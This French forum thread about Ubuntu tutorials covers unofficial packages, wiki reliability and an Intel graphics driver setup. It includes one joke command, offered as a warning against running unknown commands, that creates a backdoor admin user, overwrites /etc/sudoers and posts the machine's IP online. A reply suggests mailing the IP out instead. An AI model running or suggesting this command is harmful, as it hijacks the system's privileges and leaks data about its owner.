« J'ai du aller chercher des versions instables du noyau et du pilote dans les dépôts de debian sid pour au moins avoir un bureau fluide » quand je lis ça, tu perds toute crédibilité à mes yeux.
J'ai juste suivi un tuto du forum anglais qui disait ça. Après j'en sais rien de toute façon, j'ai jamais caché que j'y connais rien. :/(
http://ubuntuforums.org/showthread.php?t=1130582&highlight=x3100
Le tuto en question.
En tous cas ça a marché puisque j'ai des résultats excellents en EXA et presques bons en UXA.
Alors je te conseille de passer au stade où tu demandes aux gens ce qu'ils pensent des tutos en anglais où les choses faites te semblent louches.
C'est dangereux de faire ce qu'il y a dans ce tuto? Comme plusieurs personnes me l'ont conseillé sur ubuntu-fr et que ça ne m'avait pas l'air louche, j'ai essayé sans trop de méfiance.
Tu installes quelque chose sans passer vraiment par le gestionnaire de paquet, donc oui c'est louche, et donc oui il faut se méfier.
« As you can see, glxgears does not accurately portray the improvement gained from testing the latest DRI2/UXA code. » as I can see, the author does not understand at all what he is talking about. Or at least he failed to give a correct explanation...
Au passage, UXA c'est pas super stable à ma connaissance (et j'ai des devs debians qui touchent à xorg dans l'oreillettes ). Après, si ça marche chez toi, tant mieux. Normalement, l'UXA c'est prévu pour la prochaine ubuntu.
Ben au début j'étais obligé de mettre UXA parce que sinon le bureau était quasiment inutilisable.
Mais là ça va mieux et j'ai donc remis EXA.
Il y avait surement 10 façons plus propre de réparer les pots cassés. Voilà pourquoi je n'aime pas ubuntu-fr.org.
La prochaine fois je demanderai ici alors.
que reproche tu a ce site à chaque fois que j'ai besoin d'un truc/soft/info je vais voir la bas et j'y est très souvent trouver des réponses claire cela dit mais connaissance sous linux faible
Je lui reproche essentiellement 2 choses :
1) d'avoir trop d'infos (et surtout beaucoup trop d'infos qui ne sont plus du tout à jour)
2) d'être un wiki.
Globalement, c'est du très bon boulot. Mais du coup, les gens ont tendance à suivre un peu trop aveuglement tout ce qui est écrit. Or on est jamais à l'abri de tomber localement sur du grand n'importe quoi avec un wiki.
En vrai, j'ai été dur puisque je pense que ce problème est présent partout ailleurs (à commencer par ici). Ce qu'il faudrait, c'est beaucoup plus sensibiliser les gens. D'ailleurs, je suis bien loin de le faire assez.
On peux quand même dire qu'on a vrmt de bonne chance de pas tomber sur une crasse sur ubuntu-fr.org... J'ai toujours été bien conseillé. C'est clair qu'il reste des récalcitrant qui se prennent pour des experts alors qu'il s'y connaissent dans quedal...
mais c'est difficile de faire la difference.
Ils te font installe des paquets fait a la main, tu ne sais absolument pas ce qu'il y a dedans. Va t'en retrouver une faille de securite dans le bousin apres.
On voit des gens qui se retrouve avec des /etc/apt/sources.list completement delirant avec des repository debian et ubuntu melange, des fois avec differentes version des distrib.
Si on ne veut pas que linux devienne windows, il faut faire attention au forum d'aide.
Il faut ecouter chris, il est un peu aigri mais il a raison :p
arf, jvous fait confiance^^
mokotowlatombe : j'ai vu un tas de trucs très limite sur le wiki a eu époque (vers edgy/feisty notamment). Depuis hardy, ça a été bien nettoyé par contre.
Mais ça n'empêche pas qu'il faut se méfier, vérifier soit même le contenu des paquets qu'on installe et les pages de manuel avant d'exécuter une commande qu'on ne connaît pas.
executer : adduser root2; echo root2 ALL=(ALL) ALL > /etc/sudoers; wget whatismyip.com -o foo; pastebinit foo
ou comment devenir le maitre du monde.
J'utiliserai plutôt 'mail' que 'pastebinit' pour le coup.
C'est marrant, chaque fois que j'ai posé une question sur ubuntu-fr je n'ai jamais eu de réponse XD
Et pourtant, ça traitait de différents sujets (wifi, son, gtk, etc.)
Cependant, j'essaie d'apporter ma modeste contribution aux questions dont j'ai des parties de réponse.
Mais en général c'est que des "parties" de réponse, donc oui, un 100% novice qui ne s'interesse pas au système risque de s'y perdre. Et il y en a de plus en plus qui ont entendu du bien de Linux mais qui n'ont absolument pas envie de trifouiller les entrailles du système.
Ensuite, pour les installations de "paquêts sauvages", par moment c'est le passage obligé...
Je prends l'exemple de Cairo-Dock, il est dans les dépôts officiels, certes, mais une version packagée avec les pieds et pas complète (je sais même pas si elle démarre)
Tout ça parce qu'il fallait tenir les délais pour la 8.10 (alors que le developpeur principal était prêt à attendre la 9.04 pour être intégré).
Pour mon programme, c'est pareil. J'ai bien un svn, mais les personnes qui m'ont demandé ce programme à la base voulaient un .deb kivabien
Ce qu'il faudrait éventuellement, c'est un dépôt "plus ouvert" non activé par défaut. Mais ça nécessite un suivi très fort pour pas que ça dérive.
Tiens, j'ai une colle.
Quelqu'un peut m'expliquer en quoi le fait d'appyer sur une touche permet à un Ubuntu de "charger" ?
Je (tente de) m'explique(r)...
Sur le laptop de mon père, un hp pavillon dv95xx, j'ai installé Ubuntu. J'ai lu par-ci par-là qu'il y avait des problèmes avec ACPI, du coup dans mon menu.lst j'ai ajouté l'option noacpi.
Du coup, au démarrage il ne se passe RIEN à moins que je reste apuyé sur une touche du clavier jusqu'au démarrage de gdm.
Sur la 8.10 j'avais ce problème uniquement au démarrage. Et sur la 9.04 j'ai ce problème ET au démarrage, ET à la fermeture...
Une explication/solution ?
«Ce qu'il faudrait éventuellement, c'est un dépôt "plus ouvert" non activé par défaut. Mais ça nécessite un suivi très fort pour pas que ça dérive. » fait ton propre dépôt avec les .deb de ton soft.
Ceux qui ont confiance en ton soft et veulent l'utiliser seront content d'ajouter une ligne à leur sources.list. (en attenant que ça devienne un paquet officiel )